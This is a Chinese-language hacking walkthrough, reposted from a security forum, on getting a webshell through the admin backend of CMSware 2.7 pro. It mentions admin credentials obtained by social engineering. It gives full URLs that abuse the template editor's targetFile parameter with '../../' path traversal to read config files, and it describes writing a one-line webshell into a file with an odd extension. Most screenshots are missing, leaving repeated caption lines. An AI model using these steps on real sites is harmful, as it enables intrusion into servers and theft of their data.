思维内容管理系统(CMSware 2.7 pro)  后台拿shell

阿易            9769887

keio            编辑

账号密码是社工的   不能上传图片 拿shell

后台登陆界面

思维内容管理系统(CMSware 2.7 pro) 后台拿 Shell

后台不能上传图片

思维内容管理系统(CMSware 2.7 pro) 后台拿 Shell

模板管理   --公用模板

思维内容管理系统(CMSware 2.7 pro) 后台拿 Shell

随便点击一个 模板里面的文件 注意这个sid 特有的

思维内容管理系统(CMSware 2.7 pro) 后台拿 Shell

下面是用来列网站目录  需要修改2个地方

思维内容管理系统(CMSware 2.7 pro) 后台拿 Shell

思维内容管理系统(CMSware 2.7 pro) 后台拿 Shell

列出了网站根目录

http://www.xxxx.net/cms/admin/admin_tpl.php?sId=ed96865b949892f2a1bcb5241c9852dc&o=editor_frameset&extra=edit&PATH=&targetFile=../../config/config_global.php

可以查看源代码

思维内容管理系统(CMSware 2.7 pro) 后台拿 Shell

远远不止列源码   因为是linux 系统   又不让建立php的文件 就在

http://www.xxxx.net/cms/admin/admin_tpl.php?sId=ed96865b949892f2a1bcb5241c9852dc&o=editor_frameset&extra=edit&PATH=&targetFile=../../config/config_global.php.111

思维内容管理系统(CMSware 2.7 pro) 后台拿 Shell

这样提示访问错误 不要管他

思维内容管理系统(CMSware 2.7 pro) 后台拿 Shell

照样写入我们的一句话

思维内容管理系统(CMSware 2.7 pro) 后台拿 Shell

保存

思维内容管理系统(CMSware 2.7 pro) 后台拿 Shell

思维内容管理系统(CMSware 2.7 pro) 后台拿 Shell

思维内容管理系统(CMSware 2.7 pro) 后台拿 Shell

转自:https://forum.90sec.org/viewthread.php?tid=3797&extra=page%3D1%26amp%3Borderby%3Ddateline%26amp%3Bfilter%3D2592000